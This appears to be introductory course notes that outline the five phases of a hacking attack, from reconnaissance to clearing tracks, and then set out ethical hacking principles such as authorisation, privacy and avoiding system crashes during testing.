1) Reconnaissance
2) Scanning
3) Gaining Access
4) Maintaining Access
5) Clearing Tracks
• Performing Reconnaissance
• Scanning and Enumeration
• Gaining access
• Maintaining access and
Placing Backdoors
• Covering tracks or Clearing
Logs
Phase I: Reconnaissance
ü Reconnaissance
can be described as the pre-attack phase and is a systematic attempt to locate,
gather, identify, and record information about the target. The Hacker seeks to
find out as much information as possible about the target.
Phase II: Scanning and
Enumeration
ü Scanning
and enumeration is considered the second pre-attack phase. This phase involves
taking the information discovered during reconnaissance and using it to examine
the network. Scanning involves steps such as intelligent system port scanning
which is used to determine open ports and vulnerable services. In this stage
the attacker can use different automated tools to discover system
vulnerabilities.
Phase III: Gaining Access
ü This is
the phase where the real hacking takes place. Vulnerabilities discovered during
the reconnaissance and scanning phase are now exploited to gain access. The
method of connection the Hacker uses for an exploit can be a local area
network, local access to a PC, the Internet, or offline. Gaining access is
known in the Hacker world as owning the system. During a real security breach
it would be this stage where the Hacker can utilize simple techniques to cause
irreparable damage to the target system.
Phase IV: Maintaining Access and Placing Backdoors
ü Once a Hacker has gained
access, they want to keep that access for future exploitation and attacks.
Sometimes, Hackers harden the system from other Hackers or security personnel
by securing their exclusive access with Backdoors, Root kits, and Trojans.
ü The attacker can use
automated scripts and automated tools for hiding attack evidence and also to
create backdoors for further attack.
Phase V: Clearing Tracks
ü In this phase, once Hackers
have been able to gain and maintain access, they cover their tracks to avoid
detection by security personnel, to continue to use the owned system, to remove
evidence of hacking, or to avoid legal action. At present, many successful
security breaches are made but never detected. This includes cases where firewalls
and vigilant log checking were in place.
Working
of an ethical hacker
Obeying the Ethical Hacking Commandments:
ü Every Ethical Hacker must
follow few basic principles. If he do not follow, bad things can happen. Most
of the time these principles get ignored or forgotten when planning or
executing ethical hacking tests. The results are even
very dangerous.
Working ethically:
ü The word ethical can be
defined as working with high professional morals and principles. Whether you’re
performing ethical hacking tests against your own systems or for someone who
has hired you, everything you do as an ethical Hacker must be approved and must
support the company’s goals. No hidden agendas are allowed! Trustworthiness is
the ultimate objective. The misuse of information is absolutely not allowed.
That’s what the bad guys do.
Respecting privacy:
ü Treat the information you
gather with complete respect. All information you obtain during your testing —
from Web application log files to clear-text passwords — must be kept private.
Not crashing your systems:
ü One of the biggest mistakes
is when people try to hack their own systems; they come up with crashing their systems.
The main reason for this is poor planning. These testers have not read the documentation
or misunderstand the usage and power of the security tools and techniques.
ü You can easily create
miserable conditions on your systems when testing. Running too many tests too
quickly on a system causes many system lockups. Many security assessment tools
can control how many tests are performed on a system at the same time. These
tools are especially handy if you need to run the tests on production systems during
regular business hours.
Executing the plan:
ü In Ethical hacking, Time and
patience are important. Be careful when you’re performing your ethical hacking
tests. A Hacker in your network or an employee looking over your shoulder may
watch what’s going on. This person could use this information against you. It’s not practical to make
sure that no Hackers are on your systems before you start. Just make sure you
keep everything as quiet and private as possible.
ü This is especially critical when
transmitting and storing your test results. You’re now on a reconnaissance
mission. Find as much information as possible about your organization and
systems, which is what malicious Hackers do. Start with a broad view of mind
and narrow your focus. Search the Internet for your organization’s name, your computer
and network system names, and your IP addresses. Google is a great place to
start for this.
ü Don’t take ethical hacking too far,
though. It makes little sense to harden your systems from unlikely attacks. For
instance, if you don’t have a internal Web server running, you may not have to
worry too much about. However, don’t forget about insider threats from malicious
employees or your friends or colleagues.
